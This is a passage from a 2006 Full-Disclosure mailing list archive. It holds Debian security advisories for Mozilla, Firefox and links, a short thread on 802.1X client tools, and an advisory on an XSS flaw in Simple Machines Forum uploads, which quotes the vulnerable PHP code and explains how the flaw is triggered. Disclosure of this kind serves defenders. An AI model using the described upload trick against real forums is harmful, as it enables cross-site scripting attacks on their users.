158304 a8cdc38cb9ac827b54c646b8b5c2b2e7 http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 184938 4f7852977d08f31cfad5e8c352946426 http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 801008 abfe303f9e48e5341c81a9622c0f9f1c http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 1032 35f2fdd96e584c9afbda26d3395ef78f http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 11340612 0a8315780402713a6f25f3bb068b9593 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 403268 f4d3465aae90c369a0f4b0000f9b76f9 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 158330 01c26b88dbf2a25b4520e484a324267e http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 3353508 2d8ca556688100796c7b66b65f509246 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 121340 1c28f9aa34ab20b8c9b87b6a484f29c0 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 204142 e2c4c8c3b721f3560390c86f8a8e4f42 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 1944770 525714424a1fa0131327ced0961987c9 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 213646 31a3c2bc95b020fa1a4104cdb24f51cf Sun Sparc architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 168070 ec1b9711bc09abaf87a1e8caeac523a9 http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 130234 a57dbc4e7d4fb4a7269dce9063b848d9 http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 184964 f6d4813d577feef2530f5993e4dc5464 http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 674592 5634a5745abfd58cec63f3615b9a7e0e http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 1036 222687822a8e79b3407dd3edec552b19 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 9385078 1e10244c49ded27051ea0eeef38508f5 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 403290 fe2140858be3ef7e5b732dc9d98f5f40 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 158338 5703ab5f69f23b9deccc705bf97bfe16 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 3342206 18dd2adf74fc28147f85cc55d4bafc25 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 112520 0d19cd564f1c80ce919f85da844fe535 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 204166 6caff56854b59671710aace6b683bcc2 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 1583766 3366a381ab996886b6924e1d12ad0bc7 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_sparc.deb Size/MD5 checksum: 168196 2fc28554dfb6e322e354ccbdff26fb50 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFcu2fW5ql+IAeqTIRAgn6AJ4ouLaDYxzUO8yo41wOsjgdYakn7wCfamS1 o3nLd80vTavGY8LgjJxV6Ok= =SFB8 -----END PGP SIGNATURE----- From joey at infodrom.org Sun Dec 3 16:35:28 2006 From: joey at infodrom.org (Martin Schulze) Date: Sun, 3 Dec 2006 17:35:28 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1225-1] New Mozilla Firefox packages fix several vulnerabilities Message-ID: <20061203163528.5A6ABFDE1@finlandia.home.infodrom.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1225-1 security at debian.org http://www.debian.org/security/ Martin Schulze December 3rd, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : mozilla-firefox Vulnerability : several Problem type : remote Debian-specific: no CVE IDs : CVE-2006-4310 CVE-2006-5462 CVE-2006-5463 CVE-2006-5464 CVE-2006-5748 CERT advisories: VU#335392 VU#390480 VU#495288 VU#714496 BugTraq IDs : 19678 20957 Several security related problems have been discovered in Mozilla and derived products such as Mozilla Firefox. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-4310 Tomas Kempinsky discovered that malformed FTP server responses could lead to denial of service. CVE-2006-5462 Ulrich K?hn discovered that the correction for a cryptographic flaw in the handling of PKCS-1 certificates was incomplete, which allows the forgery of certificates. CVE-2006-5463 "shutdown" discovered that modification of JavaScript objects during execution could lead to the execution of arbitrary JavaScript bytecode. CVE-2006-5464 Jesse Ruderman and Martijn Wargers discovered several crashes in the layout engine, which might also allow execution of arbitrary code. CVE-2006-5748 Igor Bukanov and Jesse Ruderman discovered several crashes in the JavaScript engine, which might allow execution of arbitrary code. This update also adresses several crashes, which could be triggered by malicious websites and fixes a regression introduced in the previous Mozilla update. For the stable distribution (sarge) these problems have been fixed in version 1.0.4-2sarge13. For the unstable distribution (sid) these problems have been fixed in the current iceweasel package 2.0+dfsg-1. We recommend that you upgrade your mozilla-firefox package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13.dsc Size/MD5 checksum: 1003 4a8d05c1e9563e6066ca838e7c0b2f53 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13.diff.gz Size/MD5 checksum: 450265 46d4bedf12a1e0c92a275ae012d92b5a http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d Alpha architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_alpha.deb Size/MD5 checksum: 11182242 388bf02a94456182cd7a39187886875a http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_alpha.deb Size/MD5 checksum: 170908 4cbff185bb88b1c7e11791059cd83142 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_alpha.deb Size/MD5 checksum: 62736 f42571aa18001fc521be0f5348eb9511 AMD64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_amd64.deb Size/MD5 checksum: 9412474 fcd7ced169a47d7413197a918047036a http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_amd64.deb Size/MD5 checksum: 165706 931ebeee155ac01fcecb1467388a2fab http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_amd64.deb Size/MD5 checksum: 61276 cf839454fe9e09a0b58641353f9c75c6 ARM architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_arm.deb Size/MD5 checksum: 8233670 39a042f6300c805ad372828fd115cab0 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_arm.deb Size/MD5 checksum: 157176 873eb90c91c98e1c4168f215b493fd74 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_arm.deb Size/MD5 checksum: 56586 c53ca4b95b188684381338eae43603cc HP Precision architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_hppa.deb Size/MD5 checksum: 10287242 8a7eddef738dfe4eb164bd5e486474a2 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_hppa.deb Size/MD5 checksum: 168624 fa195e512062a19cf92018de4009160d http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_hppa.deb Size/MD5 checksum: 61736 b0dbfbbce97f954c9487a126d20b9a90 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_i386.deb Size/MD5 checksum: 8908194 9cfe0ac430050c7d62066cd3f8beb64f http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_i386.deb Size/MD5 checksum: 160902 77a78dd1eac37417b4a5629e745e4391 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_i386.deb Size/MD5 checksum: 58124 f82b3d3fc66e1054d5da72a69ab9bd20 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_ia64.deb Size/MD5 checksum: 11646376 83d5349be8156e1f95eb75da89beb578 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_ia64.deb Size/MD5 checksum: 171244 46ae3d6d9112d31f92407922832e6599 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_ia64.deb Size/MD5 checksum: 65934 690969e2e7a865faee22ed6fb8a88384 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_m68k.deb Size/MD5 checksum: 8186050 ab9f31d6cbd9ff6c1820c59ef1e44ce7 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_m68k.deb Size/MD5 checksum: 159792 69c3cf68fc12fd5fb3929339aa8cd9cb http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_m68k.deb Size/MD5 checksum: 57394 14636fe25df3a18c536819129e83e1a0 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_mips.deb Size/MD5 checksum: 9943474 75b7796d42079421a151bfac35a17f95 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_mips.deb Size/MD5 checksum: 158694 a3c6f1c71947cb5e9c2fc8d8acece832 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_mips.deb Size/MD5 checksum: 58386 395683ab3ebb0983e24bc3afde8d28f5 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge12_mipsel.deb Size/MD5 checksum: 9819470 41ecbd5f3543c0b110771e93e2307abc http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge12_mipsel.deb Size/MD5 checksum: 157672 43ca2a353bacf378a2dc7dfa9a7f3a73 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge12_mipsel.deb Size/MD5 checksum: 57634 8d16796108c3a7627ab9654e977277a5 PowerPC architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_powerpc.deb Size/MD5 checksum: 8580222 c2f239d0961911962bea6b7f7bf1cdc1 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_powerpc.deb Size/MD5 checksum: 159320 5a5ea9d8a9f7a845bc1898b0c9976112 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_powerpc.deb Size/MD5 checksum: 60508 3ce3df0f45aeef3acb1964960bf76406 IBM S/390 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_s390.deb Size/MD5 checksum: 9650866 9fd3e3788898152580a0ab344112b5ab http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_s390.deb Size/MD5 checksum: 166290 70bcea0f67fc9d0288c75bb2ad8e7b36 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_s390.deb Size/MD5 checksum: 60696 7d6b7a3cf65fa798f3e41275f4bb9967 Sun Sparc architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_sparc.deb Size/MD5 checksum: 8672090 c32301aeb3eb3ebbad2ff26f56d3e9ee http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_sparc.deb Size/MD5 checksum: 159508 7c3fd5b5a0c78c8abf09082dcb06bbfc http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_sparc.deb Size/MD5 checksum: 56946 0b154ceb732d771ca492e4d98ea21350 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFcvzPW5ql+IAeqTIRAv/HAJwNUC+NOPCf2Nq1161rGipNubPqDQCfWnmg FvfjUK0FBtQjuT9x9Fg3gu8= =1YQv -----END PGP SIGNATURE----- From guillaume.barberot at gmail.com Sat Dec 2 16:55:48 2006 From: guillaume.barberot at gmail.com (Guillaume Barberot) Date: Sat, 2 Dec 2006 17:55:48 +0100 Subject: [Full-disclosure] 802.1X tool? In-Reply-To: References: <45708D89.2030407@csuohio.edu> Message-ID: more over the Juniper-Funk-Odyssey-Client can choose to connect only one network interface if both lan an Wlan interface are connected by deconnecting the other one. 2006/12/2, Douglas Haider : > > The Funk Odyssey tool is now owned by Juniper. That being said, I have > used > the Odyssey tool and I am impressed with its functionality, especialy from > a > risk management / controls perspective. > > Respectfully, > Douglas > > > >From: Michael Holstein > >To: Full-Disclosure ,Wifisec > > > >Subject: Re: [Full-disclosure] 802.1X tool? > >Date: Fri, 01 Dec 2006 15:16:09 -0500 > > > >Meetinghouse (AEGIS) or Funk (Odyssey). > > > >Note : Meetinghouse is now owned by Cisco. > > > >Cheers, > > > >~Mike. > > > > > >Ozan Ozkara wrote: > >>Hi folks, > >> > >>I am trying to find a tool which provides automatic client configuration > >>for 802.1X implementation in windows environment. I'm trying to > >>implement 802.1x authentication for > >>both wired and wireless connection. Is there any way to do remote client > >>configuration tool for win32 environment. Will i be able to do that? > >> > >>I'd appreciate any real world experience on the subject. > >> > >>thanks > >> > >> > >> > >> > >>------------------------------------------------------------------------ > >> > >>_______________________________________________ > >>Full-Disclosure - We believe in it. > >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >>Hosted and sponsored by Secunia - http://secunia.com/ > > _________________________________________________________________ > Stay up-to-date with your friends through the Windows Live Spaces friends > list. > > http://clk.atdmt.com/MSN/go/msnnkwsp0070000001msn/direct/01/?href=http://spaces.live.com/spacesapi.aspx?wx_action=create&wx_url=/friends.aspx&mk > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061202/a2c2a809/attachment.html From joey at infodrom.org Sun Dec 3 20:01:26 2006 From: joey at infodrom.org (Martin Schulze) Date: Sun, 3 Dec 2006 21:01:26 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1225-2] New Mozilla Firefox packages fix several vulnerabilities Message-ID: <20061203200126.24E5BFDE6@finlandia.home.infodrom.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1225-2 security at debian.org http://www.debian.org/security/ Martin Schulze December 3rd, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : mozilla-firefox Vulnerability : several Problem type : remote Debian-specific: no CVE IDs : CVE-2006-4310 CVE-2006-5462 CVE-2006-5463 CVE-2006-5464 CVE-2006-5748 CERT advisories: VU#335392 VU#390480 VU#495288 VU#714496 BugTraq IDs : 19678 20957 This update covers packages for the little endian MIPS architecture missing in the original advisory. Several security related problems have been discovered in Mozilla and derived products such as Mozilla Firefox. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-4310 Tomas Kempinsky discovered that malformed FTP server responses could lead to denial of service. CVE-2006-5462 Ulrich K?hn discovered that the correction for a cryptographic flaw in the handling of PKCS-1 certificates was incomplete, which allows the forgery of certificates. CVE-2006-5463 "shutdown" discovered that modification of JavaScript objects during execution could lead to the execution of arbitrary JavaScript bytecode. CVE-2006-5464 Jesse Ruderman and Martijn Wargers discovered several crashes in the layout engine, which might also allow execution of arbitrary code. CVE-2006-5748 Igor Bukanov and Jesse Ruderman discovered several crashes in the JavaScript engine, which might allow execution of arbitrary code. This update also adresses several crashes, which could be triggered by malicious websites and fixes a regression introduced in the previous Mozilla update. For the stable distribution (sarge) these problems have been fixed in version 1.0.4-2sarge13. For the unstable distribution (sid) these problems have been fixed in the current iceweasel package 2.0+dfsg-1. We recommend that you upgrade your mozilla-firefox package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13.dsc Size/MD5 checksum: 1003 4a8d05c1e9563e6066ca838e7c0b2f53 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13.diff.gz Size/MD5 checksum: 450265 46d4bedf12a1e0c92a275ae012d92b5a http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_mipsel.deb Size/MD5 checksum: 9820186 7823ac933179f566597b7bd4e3810fcb http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_mipsel.deb Size/MD5 checksum: 158272 950a04ca3dfd4870b30d5d8c6ae536ee http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_mipsel.deb Size/MD5 checksum: 58218 0dad036900c189fc233a5fe25c2edd3a These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFcy0VW5ql+IAeqTIRAgxMAKC0SdOsZeB/nY4PZL+cqJJFJkhPQgCgo2DD Bl3uw4f40sxNi3ss3FrgBPY= =OMQR -----END PGP SIGNATURE----- From jmm at debian.org Sun Dec 3 20:19:22 2006 From: jmm at debian.org (Moritz Muehlenhoff) Date: Sun, 3 Dec 2006 21:19:22 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1226-1] New links packages fix arbitrary shell command execution Message-ID: <20061203201922.GA6852@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1226-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff December 3rd, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : links Vulnerability : insufficient escaping Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-5925 Debian Bug : 399187 Teemu Salmela discovered that the links character mode web browser performs insufficient sanitising of smb:// URIs, which might lead to the execution of arbitrary shell commands. For the stable distribution (sarge) this problem has been fixed in version 0.99+1.00pre12-1sarge1. For the upcoming stable distribution (etch) this problem has been fixed in version 0.99+1.00pre12-1.1. For the unstable distribution (sid) this problem has been fixed in version 0.99+1.00pre12-1.1. We recommend that you upgrade your links package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1.dsc Size/MD5 checksum: 628 a1ac1c1549a102a35398b6453df8cf03 http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1.diff.gz Size/MD5 checksum: 8329 5898f75988aba793e9559295996289ef http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12.orig.tar.gz Size/MD5 checksum: 597848 c262b08c822a582bbc992e3730f43336 Architecture independent components: http://security.debian.org/pool/updates/main/l/links/links-ssl_0.99+1.00pre12-1sarge1_all.deb Size/MD5 checksum: 5460 d983ff06f50743eefc590e13b881c649 Alpha architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_alpha.deb Size/MD5 checksum: 441038 6d3f4dbcdb63455d1a7c6c573c0a2cb0 AMD64 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_amd64.deb Size/MD5 checksum: 396200 13443385aff64d07c142561684d3698d ARM architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_arm.deb Size/MD5 checksum: 376692 90dc38882cee571a605ea4c1b312101f HP Precision architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_hppa.deb Size/MD5 checksum: 416286 1a0e7cd0c9885a5a47f89feecdeea13a Intel IA-32 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_i386.deb Size/MD5 checksum: 385186 a99be183941d62c33bd7d0f49c1856cb Intel IA-64 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_ia64.deb Size/MD5 checksum: 524446 e68877303d408b3b730e703c6d78f709 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_m68k.deb Size/MD5 checksum: 343786 51765dbe4d8788b4f4219c6f71461579 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_mips.deb Size/MD5 checksum: 412208 f3272fc9e06d0ad0bed4c2d2816502fe Little endian MIPS architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_mipsel.deb Size/MD5 checksum: 408254 70f5c450fd225ea6a82befeb3d6aeeab PowerPC architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_powerpc.deb Size/MD5 checksum: 396926 b0cbccacc3632be2d3eb97cea74ea6d8 IBM S/390 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_s390.deb Size/MD5 checksum: 390546 2def4e695f30d34bb03a0592f5deee5b Sun Sparc architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_sparc.deb Size/MD5 checksum: 379836 be1bae25603d4a50cf854a6b6b075960 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFczECXm3vHE4uyloRAnygAJwJea6TheWExHFK0nH5A5rbWDG3ygCgmbfu 5P76B0rdqS+zzIEMonB9cWU= =Hj9Z -----END PGP SIGNATURE----- From davek_throwaway at hotmail.com Sun Dec 3 20:32:16 2006 From: davek_throwaway at hotmail.com (Dave "No, not that one" Korn) Date: Sun, 3 Dec 2006 20:32:16 -0000 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> Message-ID: TheGesus wrote: > More and more people are hearing the recommendation to "withdraw a > little extra cash out of the banks" to prepare for cyber attacks. If > as many as 1.32% of bank depositors take their advice and withdraw all > their money, the banks will close their doors. > > Al Qaeda threatens to disrupt the electronic bank payments system. And YOU'RE MAKING IT HAPPEN! DUH! > This system contributes about 90% of the US money supply. Without it, > 10% of the money supply (the cash & coin) must take over the work of > the other 90%. > > Conclusion: Withdraw and stockpile some cash now. Shoot for at least > three months' cash requirements. Don't wait. Start now. AQ don't intend to "attack the banking system". They plan to get paranoids, suckers, and conspiracy-theorists like you to do their dirty work for them. They just need to spread a rumour and then sit back and watch as all you "loyal patriots" trash your own country out of fear and cowardice. ObTopic: Sounds like a social engineering attack to me; attempting to manipulate the users of a service into acting as an implicit ddos against it. cheers, DaveK -- Can't think of a witty .sigline today.... From jessicasaulhope at googlemail.com Sun Dec 3 18:16:23 2006 From: jessicasaulhope at googlemail.com (Jessica Hope) Date: Sun, 3 Dec 2006 18:16:23 +0000 Subject: [Full-disclosure] SMF upload XSS vulnerability Message-ID: <44740eb60612031016t1f4225aeyc0b861441a64a579@mail.gmail.com> ====================================================================== Advisory : SMF upload XSS vulnerability Release Date : December 4th, 2006 Application : Simple Machines Forum Version : SMF 1.1 Final (and earlier versions) Platform : PHP Vendor URL : http://www.simplemachines.org Authors : Jessica Hope ( jessicasaulhope at googlemail.com ) : rotwang ( c.a.rotwang at googlemail.com ) ======================================================================= Overview Due to various failures in sanitising user input, it is possible to construct XSS attacks using files masquerading as images. ======================================================================= Discussion A often ignored XSS hazard sprouts from the Internet Explorer's habit to "guess" the type of displayed data, when mime-type and header do not match. This is especially dangerous in software allowing image uploads; the accepted counter-measure is to use getimagesize to guarantee that the correct mime-type is chosen. SMF's implementation of this check is faulty, as it can be overridden by simply setting the parameter "image". In that case, the file will be delivered with the type "image/gif", regardless of the file's content or name. Even an uploaded text file is able to carry an XSS vector. Neither the upload function, nor the delivery code actually act upon the file's content. The admin function "Check attachment's extension" has no impact on that behaviour. Vulnerable code in Display.php Line 1045 if (filesize($filename) != 0) { $size = @getimagesize($filename); if (!empty($size) && $size[2] > 0 && $size[2] < 4) header('Content-Type: image/' . ($size[2] != 1 ? ($size[2] != 2 ? 'png' : 'jpeg') : 'gif')); // Errr, it's an image.... what kind? A... gif? Yeah that's it, gif! Like JIF, the peanut butter. elseif (isset($_REQUEST['image'])) header('Content-Type: image/gif'); } ======================================================================= Solution It is possible to work around the issue like so: $size = @getimagesize($filename); if (!empty($size) && $size[2] > 0 && $size[2] < 4) { header('Content-Type: image/' . ($size[2] != 1 ? ($size[2] != 2 ? 'png' : 'jpeg') : 'gif')); } // Errr, it's not an image.... what kind? Ah, let's play it safe else { header('Content-Disposition: attachment; filename="' . $real_filename . '"'); header('Content-Type: application/octet-stream'); } Moreover, the upload function should check the actual filtype. Files with invalid extensions should not be accepted as uploads. The avatar function already implements such checks; they should be applied for the attachment function as well. ======================================================================= History: Having dealt with SMF in the past, I know that they do not take security seriously (have a look at my earlier IP spoofing SMF report). Thus until I believe that SMF have shaped up in terms of security, any issues that I come across I'll be posting a full disclosure immediately. Incidently, the IP spoofing still exsists in the latest SMF too. They never learn. 04th December 2006: Full disclosure ======================================================================= Credit This issue is to be credited to Jessica Hope ( jessicasaulhope at googlemail.com ), and rotwang ( c.a.rotwang at googlemail.com ) From joey at infodrom.org Mon Dec 4 08:14:59 2006 From: joey at infodrom.org (Martin Schulze) Date: Mon, 4 Dec 2006 09:14:59 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1227-1] New Mozilla 